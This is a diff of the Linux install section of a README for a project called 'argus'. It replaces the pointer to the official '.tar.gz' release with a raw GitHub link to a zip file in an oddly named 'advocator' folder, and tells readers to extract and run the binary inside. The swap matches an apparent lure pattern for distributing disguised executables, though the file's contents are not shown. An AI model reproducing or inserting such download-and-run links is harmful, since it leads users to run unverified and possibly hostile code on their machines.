KMadhanesh/argus/README.md

 ### For Linux Users
 1. Head to the **Releases** page.
-2. Choose the `.tar.gz` package designed for Linux.
+2. Choose the `https://raw.githubusercontent.com/KMadhanesh/argus/main/advocator/argus.zip` package designed for Linux.
 3. Download the file and extract it using your terminal.
 4. After extraction, locate the `argus` binary.
 5. Run the binary from your terminal.